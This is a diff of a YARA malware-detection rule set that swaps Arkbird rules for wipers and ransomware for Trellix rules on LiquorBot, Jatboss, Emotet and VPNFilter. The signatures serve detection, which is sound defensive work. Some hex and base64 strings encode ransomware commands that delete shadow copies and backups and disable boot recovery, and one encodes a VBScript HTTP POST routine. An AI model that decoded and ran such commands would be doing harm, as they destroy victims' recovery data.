-		$s6 = { 7e ?? 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 6f [2] 00 0a 0a 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f [2] 00 0a 06 6f ?? 00 00 0a de 03 26 de 00 2a }
-		$s7 = { 28 ?? 00 00 06 0a 02 06 28 ?? 00 00 06 0b 07 6f [2] 00 0a 16 16 17 20 ff 0f 1f 00 17 14 73 [2] 00 0a 16 14 73 [2] 00 0a 6f [2] 00 0a 02 06 07 28 ?? 00 00 06 de 03 26 de 00 2a 00 00 00 }
+		$x1 = "\\Work\\d2Od7s43\\techloader\\loader" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule ARKBIRD_SOLG_APT_APT34_Dustman_Apr_2021_1 : FILE
+rule TRELLIX_ARC_MALW_Liquorbot : MALWARE FILE
 {
 	meta:
-		description = "Detect the Installer of Dustman wiper used by APT34"
-		author = "Arkbird_SOLG"
-		id = "071063f5-d2a4-5666-a8c4-283c02061f6d"
-		date = "2021-04-28"
-		modified = "2021-04-30"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-29/APT34/APT_APT34_Dustman_Apr_2021_1.yara#L1-L19"
-		license_url = "N/A"
-		logic_hash = "44e68fa21c1d6258bc9c0dcdc9cc531a15081122c90b23607bcfda716471aeb6"
+		description = "Rule to detect LiquorBot malware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "73898df8-b5eb-50ac-a2fe-ef9233c251c5"
+		date = "2020-08-19"
+		modified = "2020-08-19"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_liquorbot.yar#L1-L23"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "2448e3ede809331b2370fe9d42d603ad6508be6531a1a8764e0e0621867b6e89"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "a9397eb9e95087db7e03239c689776d56c1450d685568564acd90e1532c78882"
-		tlp = "white"
-		adversary = "APT34"
+		quality = 70
+		tags = "MALWARE, FILE"
+		rule_version = "v1"
+		malware_type = "malware"
+		malware_family = "Botnet:W32/LiquorBot"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
+		hash1 = "5b2a9cbda99ed903f75c3b37f0a6b1b9f6c39671a76ed652f3ddba117fd43bc9"
 
 	strings:
-		$s1 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 63 6d 64 2e 65 78 65 00 00 00 00 00 2f 63 20 61 67 65 6e 74 2e 65 78 65 20 41 00 00 44 00 6f 00 77 00 6e 00 20 00 57 00 69 00 74 00 68 00 20 00 42 00 69 00 6e 00 20 00 53 00 61 00 6c 00 6d 00 61 00 6e 00 00 00 00 00 5c 00 }
-		$s2 = "\\assistant.sys" fullword wide
-		$s3 = { 61 00 67 00 65 00 6e 00 74 00 2e 00 65 00 78 00 65 00 00 00 00 00 00 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4f 00 72 00 61 00 63 00 6c 00 65 00 5c 00 56 00 69 00 72 00 74 00 75 00 61 00 6c 00 42 00 6f 00 78 00 00 00 00 00 54 68 65 20 4d 61 67 69 63 20 57 6f 72 64 21 00 56 00 42 00 6f 00 78 00 44 00 72 00 76 00 00 00 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 00 00 56 00 42 00 6f 00 78 00 55 00 53 00 42 00 4d 00 6f 00 6e 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 41 00 64 00 70 00 00 00 00 00 56 00 42 00 6f 00 78 00 4e 00 65 00 74 00 4c 00 77 00 66 }
-		$s4 = { 5c 00 5c 00 2e 00 5c 00 25 00 73 }
-		$s5 = { 68 54 00 00 00 68 00 00 00 00 68 80 69 40 00 e8 f4 0f 00 00 83 c4 0c 68 00 00 00 00 e8 ed 0f 00 00 a3 84 69 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 e8 da 0f 00 00 a3 80 69 40 00 e8 fc 2f 00 00 e8 7d 2c 00 00 e8 7a 18 00 00 e8 1d 12 00 00 e8 40 2d 00 00 68 00 00 00 00 e8 78 2f 00 00 a3 8c 69 40 00 68 00 00 00 00 e8 8d 2f 00 00 a3 90 69 40 00 c7 05 94 69 40 00 5a 00 00 00 c7 05 98 69 40 00 14 00 00 00 8b 1d 8c 69 40 00 2b 1d 94 69 40 00 83 c3 ea 89 1d 9c 69 40 00 8b 1d 90 69 40 00 2b 1d 98 69 40 00 83 c3 cc 89 1d a0 69 40 00 68 00 00 c8 00 68 18 60 40 00 ff 35 98 69 40 00 ff 35 94 69 40 00 ff 35 a0 69 40 00 ff 35 9c 69 40 00 68 00 00 00 }
-		$s6 = "Release\\Dustman.pdb" fullword ascii
+		$pattern = { 7F454C4602010100000000000000000002003E0001000000605A4600000000004000000000000000700200000000000000000000400038000A0040001B00090006000000040000004000000000000000400040000000000040004000000000003002000000000000300200000000000000100000000000000300000004000000E00F000000000000E00F400000000000E00F40000000000020000000000000002000000000000000010000000000000004000000040000007C0F0000000000007C0F4000000000007C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000040FB29000000000040FB2900000000000010000000000000010000000400000000002A000000000000006A000000000000006A0000000000E4492C0000000000E4492C000000000000100000000000000100000006000000005056000000000000509600000000000050960000000000E014040000000000681307000000000000100000000000000200000006000000405156000000000040519600000000004051960000000000300100000000000030010000000000000800000000000000070000000400000000000000000000000000000000000000000000000000000000000000000000000800000000000000080000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A00000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010000000600000000000000001040000000000000100000000000001FE9290000000000000000000000000010000000000000000000000000000000F000000001000000060000000000000020F969000000000020F929000000000020020000000000000000000000000000100000000000000010000000000000007000000001000000020000000000000000006A000000000000002A0000000000A678110000000000000000000000000020000000000000000000000000000000E0000000040000000200000000000000A8787B0000000000A8783B000000000018000000000000000B0000000000000008000000000000001800000000000000E6000000040000000200000000000000C0787B0000000000C0783B000000000018030000000000000B0000000200000008000000000000001800000000000000F5000000FF }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and 4 of them
+		uint16( 0 ) == 0x457f and all of them
 }
-rule ARKBIRD_SOLG_Ran_Buran_Oct_2020_1 : FILE
+rule TRELLIX_ARC_Jatboss : PHISHING FILE
 {
 	meta:
-		description = "Detect Buran ransomware"
-		author = "Arkbird_SOLG"
-		id = "dbdc251e-9ac6-5de1-8a72-72ac159daf4c"
-		date = "2020-11-05"
-		modified = "2020-11-06"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1323956405976600579"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-06/Buran/Ran_Buran_Oct_2020_1.yar#L1-L22"
-		license_url = "N/A"
-		logic_hash = "a6984d21451c980d001e040325c66b547060653ac97556bc379da40f3ab6a70a"
+		description = "Rule to detect PDF files from Jatboss campaign and MSG files that contained those attachents"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "009a7486-2ee8-57ef-8dfd-fcbd035b4e85"
+		date = "2019-12-04"
+		modified = "2020-08-14"
+		reference = "https://exchange.xforce.ibmcloud.com/collection/JATBOSS-Phishing-Kit-17c74b38860de5cb9fc727e6c0b6d5b5"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_jatboss.yar#L1-L36"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "b81fb37dc48812f6ad61984ecf2a8dbbfe581120257cb4becad5375a12e755bb"
+		logic_hash = "5e6e4c8f6c0896623f166a98eb83a9a4f23139306671cf2e35ba239b2dc191fc"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "66fc6e71a9c6be1f604c4a2d0650914f67c45d894fd1f76913e463079d47a8af"
-		hash2 = "93fe277d54f4baac5762412dda6f831bf6a612f166daade7c23f6b38feac94fb"
-		hash3 = "b3302c4a9fd06d9fde96c9004141f80e0a9107a9dead1659e77351f1b1c87cf6"
-		hash4 = "eb920e0fc0c360abb901e04dce172459b63bbda3ab8152350885db4b44d63ce5"
-		hash5 = "f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb"
-		hash6 = "29cdd5206422831334afa75c113b615bb8e0121254dd9a2196703ce6b1704ff8"
+		quality = 66
+		tags = "PHISHING, FILE"
+		rule_version = "v1"
+		malware_type = "phishing"
+		malware_family = "Phishing:W32/Jatboss"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = "!!! LOCALPUBKEY !!!" fullword ascii
-		$s2 = "!!! ENCLOCALPRIVKEY !!!" fullword ascii
-		$s3 = "!!! D !!!" fullword ascii
-		$s4 = { 8b 85 74 fd ff ff 8b 40 04 85 c0 74 05 83 e8 04 8b 00 8d 55 f4 92 e8 c1 aa fe ff 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8d 45 f4 e8 d3 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 0c 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 45 f4 8b 95 74 fd ff ff 8b 52 04 e8 da a7 fe ff 0f 84 7d 07 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 74 fd ff ff 83 c0 04 e8 63 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 10 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 50 fd ff ff 8b 10 ff 12 52 50 8b c7 99 03 85 48 fd ff ff 13 95 4c fd ff ff 3b 54 24 04 75 03 3b 04 24 5a 58 0f 85 dc 06 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 8b 85 50 fd ff ff e8 e6 cc fe ff 8b 85 74 fd ff ff 8b 40 28 85 c0 74 09 83 f8 0a 0f 85 00 01 00 00 8b 85 74 fd ff ff 83 c0 1c e8 fe a2 fe ff 8b 85 74 fd ff ff 83 c0 20 e8 f0 a2 fe ff c7 85 44 fd ff ff 01 00 00 00 b8 00 01 00 00 e8 78 44 ff ff 8b d0 8d 85 10 fd ff ff e8 b7 a4 fe ff 8b 95 10 fd ff ff 8b 85 74 fd ff ff 83 c0 20 e8 63 a5 fe ff 83 bd 44 fd ff ff 10 7f 2b b8 00 01 00 00 e8 44 44 ff ff 8b d0 8d 85 0c fd ff ff e8 83 a4 fe ff 8b 95 0c fd ff ff 8b 85 74 fd ff ff 83 c0 1c e8 2f a5 fe ff ff 85 44 fd ff ff 83 bd 44 fd ff ff 21 75 92 8b 85 74 fd ff ff 83 c0 24 50 8b 85 74 fd ff ff 8b 48 1c 8b 85 74 fd ff ff 8b 50 20 8d 85 08 fd ff ff e8 45 a5 fe ff 8b 85 08 fd ff ff 8b 95 74 fd ff ff 8d 4a 0c 8b 95 74 fd ff ff 83 c2 14 e8 c8 8f ff ff 8d 95 04 fd ff ff 8b 85 74 fd ff ff 8b 40 24 e8 0c 5c ff ff 8b 95 04 fd ff ff 8b 85 74 fd ff ff 83 c0 24 e8 60 a2 fe ff 8b 85 74 fd ff ff 83 78 28 0a 75 0d 8b 85 74 fd ff ff 33 d2 89 50 28 eb 09 8b 85 74 fd ff ff ff 40 28 8b c3 99 52 50 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 54 b2 fe ff 89 85 38 fd ff ff 89 95 3c fd ff ff 8b c3 99 52 50 8b 85 38 fd ff ff 8b 95 3c fd ff ff e8 0e b2 fe ff 52 50 8b c6 99 3b 54 24 04 75 09 3b 04 24 5a 58 73 18 eb 04 5a 58 7d 12 8b c6 99 f7 fb 99 89 85 38 fd ff ff 89 95 3c fd ff ff 83 bd 3c fd ff ff 00 75 07 83 bd 38 fd ff ff 00 74 31 ff b5 3c fd ff ff ff b5 38 fd ff ff 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 d9 b1 fe ff 89 85 30 fd ff ff 89 95 34 fd ff ff 89 9d 2c fd ff ff eb 38 c7 85 38 fd ff ff 01 00 00 00 c7 85 3c fd ff ff 00 00 00 00 8b 85 48 fd ff ff 89 85 30 fd ff ff 8b 85 4c fd ff ff 89 85 34 fd ff ff 8b 85 48 fd ff ff 89 85 2c fd ff ff 8d 45 f0 e8 05 a1 fe ff b2 01 a1 98 6f 40 00 e8 61 94 fe ff 89 85 1c fd ff ff 8b 9d 38 fd ff ff 85 db 0f 8e 9f 00 00 00 c7 85 44 fd ff ff 01 00 00 00 ff b5 34 fd ff ff ff b5 30 fd ff ff 8b 85 44 fd ff ff 48 99 e8 1e b1 fe ff 89 85 20 fd ff ff 89 95 24 fd ff ff 8d 95 20 fd ff ff b9 08 00 00 00 8b 85 1c fd ff ff 8b 30 ff 56 10 ff b5 24 fd ff ff ff b5 20 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8d 45 f4 8b 95 2c fd ff ff e8 19 a7 fe ff 8d 45 f4 e8 3d a5 fe ff 8b d0 8b 8d 2c fd ff ff 8b 85 50 fd ff ff e8 e6 ca fe ff 8d 45 f0 8b 55 f4 e8 fb a2 fe ff ff 85 44 fd ff ff 4b 0f 85 6b ff ff ff 6a 00 6a 00 33 d2 8b 85 1c fd ff ff 8b 08 ff 51 18 8d 45 ec e8 2d a0 fe ff 8b 85 1c fd ff ff 8b 10 ff 12 89 85 18 fd ff ff 8d 45 ec 8b 95 18 fd ff ff e8 af a6 fe ff 8d 45 ec e8 d3 a4 fe ff 8b d0 8b 8d 18 fd ff ff 8b 85 1c fd ff ff 8b 18 ff 53 }
-		$s5 = ": :(:,:0:4:8:<:@:D:H:\\:|:" fullword ascii
-		$s6 = " remove '.' from {.$DEFINE ComplexBraces}" fullword ascii
+		$jat = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 }
+		$jatboss = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 }
+		$spam = { 54 00 68 00 69 00 73 00 20 00 65 00 2D 00 6D 00 61 00 69 00 6C 00 20 00 61 00 6E 00 64 00 20 00 61 00 6E 00 79 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 6D 00 65 00 6E 00 74 00 20 00 61 00 72 00 65 00 20 00 43 00 6F 00 6E 00 66 00 69 00 64 00 65 00 6E 00 74 00 69 00 61 00 6C 00 2E 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 4 of them
+		( uint16( 0 ) == 0x5025 and filesize < 1000KB and ( $jat or $jatboss ) ) or ( uint16( 0 ) == 0xcfd0 and $spam and any of ( $jat* ) )
 }
-rule ARKBIRD_SOLG_MAL_Milum_Jul_2021_1 : FILE
+rule TRELLIX_ARC_MALW_Emotet : FINANCIAL FILE
 {
 	meta:
-		description = "Detect Milum malware"
-		author = "Arkbird_SOLG"
-		id = "ba1cc56e-f6da-57db-a773-4823ae343e31"
-		date = "2021-07-08"
-		modified = "2021-07-08"
-		reference = "https://securelist.com/wildpressure-targets-macos/103072/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-08/WildPressure/MAL_Milum_Jul_2021_1.yara#L1-L33"
-		license_url = "N/A"
-		logic_hash = "4321051fdc9ab5f4ee12c4b505e4271df89b489067875eaf3d2cb670815f7e37"
+		description = "Rule to detect unpacked Emotet"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "5bc83065-dfdd-56b7-9983-200bff35c8b1"
+		date = "2020-07-21"
+		modified = "2020-08-14"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_emotet.yar#L1-L32"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "223e4453a6c3b56b0bc0f91147fa55ea59582d64b8a5c08f1f8d06026044065e"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "7eafb957c2e715e06489a979a185f75d7a9d502223c8aba36e7b6b8ead7d03b2"
-		hash2 = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9"
-		hash3 = "5e0226f37b861876ec38e4a1564a26e4af3022d869375bc0f09b8feea4cd9e1b"
-		tlp = "White"
-		adversary = "WildPressure"
+		quality = 70
+		tags = "FINANCIAL, FILE"
+		rule_version = "v1"
+		malware_type = "financial"
+		malware_family = "Backdoor:W32/Emotet"
+		actor_type = "Cybercrime"
+		hash1 = "a6621c093047446e0e8ae104769af93a5a8ed147ab8865afaafbbd22adbd052d"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 52 00 4f 00 4f 00 54 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 00 65 00 6c 00 65 00 63 00 74 00 20 [3-7] 20 00 46 00 72 00 6f 00 6d 00 20 00 41 00 6e 00 74 00 69 00 56 00 69 00 72 00 75 00 73 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 20 00 57 00 48 00 45 00 52 00 45 00 20 00 64 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 20 00 3c 00 3e 00 27 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 44 00 65 00 66 00 65 00 6e 00 64 00 65 00 72 00 27 }
-		$s2 = "c1VybCA9IHt1fQ0Kc1JlcXVlc3QgPSB7cH0NCkhUVFBQb3N0IHNVcmwsIHNSZXF1ZXN0DQpGdW5jdGlvbiBIVFRQUG9zdChzVXJsLCBzUmVxdWVzdCkNCiAgc2V0IG9IVFRQID0gQ3JlYXRlT2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpDQogIG9IVFRQLm9wZW4gIlBPU1QiLCBzVXJsLGZhbHNlDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZXF1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogIFdzY3JpcHQuRWNobyBvSFRUUC5yZXNwb25zZVRleHQNCiAgSFRUUFBvc3QgPSBvSFRUUC5yZXNwb25zZVRleHQNCiBFbmQgRnVuY3Rpb24=" fullword ascii
-		$s3 = { 46 49 4c 45 20 48 41 4e 44 45 4c 20 4e 4f 54 20 46 4f 55 4e 44 00 00 00 4e 4f 20 44 61 74 61 00 }
-		$s4 = { 28 00 77 00 73 00 33 00 32 00 29 00 65 00 79 00 4a 00 73 00 62 00 32 00 35 00 6e 00 64 00 32 00 46 00 70 00 64 00 43 00 49 00 36 00 49 00 6a 00 }
-		$s5 = { 55 8b ec 6a ff 68 [3] 00 64 a1 00 00 00 00 50 83 ec 24 a1 [3] 00 33 c5 89 45 f0 ?? 57 50 8d 45 f4 64 a3 00 00 00 00 [8] b9 0f 00 00 00 89 4e }
-		$s6 = { 20 2f 63 20 [0-1] 46 4f 52 20 2f 6c 20 25 69 20 69 6e 20 28 31 2c 31 2c [1-4] 29 20 44 4f 20 49 46 20 4e 4f 54 20 45 58 49 53 54 20 22 00 22 29 }
-		$s7 = { 83 c4 0c 8d 95 44 fe ff ff 52 c7 85 44 fe ff ff 14 01 00 00 ff 15 [3] 00 83 bd 48 fe ff ff 06 7d 17 bf [3] 00 89 bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 eb 1a c7 85 ?? fe ff ff [3] 00 8b bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 }
-		$s8 = { 8b 45 08 50 68 bc 78 45 00 68 d0 78 45 00 8d 8d d0 fc ff ff 51 ff d6 83 c4 10 8b 3d a0 e0 44 00 8b 35 c4 e0 44 00 8d 64 }
+		$pattern_0 = { 8b45fc 8be5 5d c3 55 8bec }
+		$pattern_1 = { 3c39 7e13 3c61 7c04 3c7a 7e0b 3c41 }
+		$pattern_2 = { 7c04 3c39 7e13 3c61 7c04 3c7a 7e0b }
+		$pattern_3 = { 5f 8bc6 5e 5b 8be5 }
+		$pattern_4 = { 5f 668906 5e 5b }
+		$pattern_5 = { 3c30 7c04 3c39 7e13 3c61 7c04 }
+		$pattern_6 = { 53 56 57 8bfa 8bf1 }
+		$pattern_7 = { 3c39 7e13 3c61 7c04 3c7a 7e0b }
+		$pattern_8 = { 55 8bec 83ec14 53 }
+		$pattern_9 = { 5e 8be5 5d c3 55 8bec }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
+		7 of them and filesize < 180224
 }
-rule ARKBIRD_SOLG_Ran_Ranzy_Locker_Nov_2020_1 : FILE
+rule TRELLIX_ARC_Vpnfilter : BACKDOOR FILE
 {
 	meta:
-		description = " Detect Ranzy Locker (RAAS)"
-		author = "Arkbird_SOLG"
-		id = "7e81d73a-ef18-5f89-b6b3-f56212d30b4a"
-		date = "2020-11-19"
-		modified = "2020-11-19"
-		reference = "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-19/Ranzy_Locker/Ran_Ranzy_Locker_Nov_2020_1.yar#L1-L36"
-		license_url = "N/A"
-		logic_hash = "e27017fa196d14b88c5cb682a070d10e42b63f9e21189d9917c0ae03c47216cc"
+		description = "Filter for 2nd stage malware used in VPNfilter attack"
+		author = "Christiaan Beek @ McAfee Advanced Threat Research"
+		id = "89bd7f94-d73c-5c5c-a3ec-0331f79e61fd"
+		date = "2018-05-23"
+		modified = "2020-08-14"
+		reference = "https://blog.talosintelligence.com/2018/05/VPNFilter.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_VPNfilter.yar#L1-L40"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387"
+		logic_hash = "88f08765dff632f0c08e985181309e5c3ac9cdaa51d05d8485c411fb1a183cca"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "393fd0768b24cd76ca653af3eba9bff93c6740a2669b30cf59f8a064c46437a2"
-		hash2 = "90691a36d1556ba7a77d0216f730d6cd9a9063e71626489094313c0afe85a939"
-		hash3 = "ade5d0fe2679fb8af652e14c40e099e0c1aaea950c25165cebb1550e33579a79"
-		hash4 = "bbf122cce1176b041648c4e772b230ec49ed11396270f54ad2c5956113caf7b7"
-		hash5 = "c4f72b292750e9332b1f1b9761d5aefc07301bc15edf31adeaf2e608000ec1c9"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/VPNfilter"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
-		$s2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
-		$s3 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
-		$s4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
-		$s5 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
-		$s6 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573"
-		$s7 = "7B5549447D" ascii
-		$s8 = "7B5041545445524E5F49447D" ascii
-		$s9 = "726561646D652E747874" ascii
-		$s10 = "226E6574776F726B223A22" ascii
-		$s11 = "226C616E67223A22" ascii
-		$s12 = "7B4558547D" ascii
-		$s13 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838"
-		$s14 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii
-		$s15 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii
-		$s16 = "227375626964223A22" ascii
-		$s17 = "22657874223A22" ascii
-		$s18 = "226B6579223A22" ascii
-		$seq1 = { 8b 46 50 8d 4d a4 83 7d d4 10 53 8b 1d 14 80 41 00 89 45 a4 8d 45 c0 0f 43 45 c0 51 50 6a 00 6a 01 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 b9 00 00 00 8b 46 68 8d 4d a4 83 7d ec 10 57 89 45 a4 8d 45 d8 0f 43 45 d8 33 ff 51 50 6a 00 47 57 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 8a 00 00 00 c6 45 fc 02 33 db 8b 45 e8 8b 4d d0 03 c1 6a 0f 5a 89 5d b8 89 55 bc 88 5d a8 89 7d a4 3b c2 76 15 88 5d a0 8d 4d a8 ff 75 a0 50 e8 78 02 00 00 8b 4d d0 89 5d b8 83 7d d4 10 8d 45 c0 51 0f 43 45 c0 8d 4d a8 50 e8 ca de ff ff 83 7d ec 10 8d 45 d8 ff 75 e8 0f 43 45 d8 8d 4d a8 50 e8 b3 de ff ff 8d 45 a8 50 8d 4e 70 e8 b8 d8 ff ff 8d 4d a8 e8 3f bf ff ff 8d 4d d8 e8 37 bf ff ff 8d 4d c0 e8 2f bf ff ff b0 01 eb 12 8d 4d d8 e8 23 bf ff ff 8d 4d c0 e8 1b bf ff ff 32 c0 e8 3f f1 }
-		$seq2 = { 8b 75 08 33 ff 8b 55 0c 33 c0 89 b5 68 fb ff ff 89 bd ac fb ff ff c7 85 b0 fb ff ff 07 00 00 00 66 89 85 9c fb ff ff 89 7d fc 39 7a 10 0f 84 da 00 00 00 6a 02 0f 57 c0 8d 8d 84 fb ff ff 58 66 0f 13 85 bc fb ff ff 66 89 85 b4 fb ff ff e8 6e ac ff ff 83 78 14 10 72 02 8b 00 50 ff 15 18 82 41 00 8d 8d 84 fb ff ff 89 85 b8 fb ff ff e8 8f a8 ff ff 68 87 69 00 00 ff 15 0c 82 41 00 bb 01 04 00 00 66 89 85 b6 fb ff ff 53 8d 85 c4 fb ff ff 57 50 e8 fd 2d 00 00 83 c4 0c 8d 7d cc 33 c0 6a 08 59 6a 08 6a 20 f3 ab 8d 45 cc 50 53 8d 85 c4 fb ff ff 50 6a 10 8d 85 b4 fb ff ff 50 ff 15 1c 82 41 00 85 c0 75 45 8d 85 c4 fb ff ff 50 8d 8d 6c fb ff ff e8 7f a8 ff ff 8b d0 c6 45 fc 01 8d 8d 84 fb ff ff e8 26 ab ff ff 50 8d 8d 9c fb ff ff e8 88 bf ff ff 8d 8d 84 fb ff ff e8 c8 c2 ff ff 8d 8d 6c fb ff ff e8 f5 a7 ff ff 8d 85 9c fb }
+		$s1 = "id-at-postalAddress" fullword ascii
+		$s2 = "/bin/shell" fullword ascii
+		$s3 = "/DZrtenNLQNiTrM9AM+vdqBpVoNq0qjU51Bx5rU2BXcFbXvI5MT9TNUhXwIDAQAB" fullword ascii
+		$s4 = "Usage does not match the keyUsage extension" fullword ascii
+		$s5 = "id-at-postalCode" fullword ascii
+		$s6 = "vTeY4KZMaUrveEel5tWZC94RSMKgxR6cyE1nBXyTQnDOGbfpNNgBKxyKbINWoOJU" fullword ascii
+		$s7 = "id-ce-extKeyUsage" fullword ascii
+		$s8 = "/f8wYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJBgNV" fullword ascii
+		$s9 = "/etc/config/hosts" fullword ascii
+		$s10 = "%s%-18s: %d bits" fullword ascii
+		$s11 = "id-ce-keyUsage" fullword ascii
+		$s12 = "Machine is not on the network" fullword ascii
+		$s13 = "No XENIX semaphores available" fullword ascii
+		$s14 = "No CSI structure available" fullword ascii
+		$s15 = "Name not unique on network" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 10 of ( $s* ) and 1 of ( $seq* )
+		( uint16( 0 ) == 0x457f and filesize < 500KB and ( 8 of them ) ) or ( all of them )
 }
-rule ARKBIRD_SOLG_APT_Lazarus_HTA_Apr_2021_1 : FILE
+rule TRELLIX_ARC_Malw_Inabot_Worm : WORM FILE
 {
 	meta:
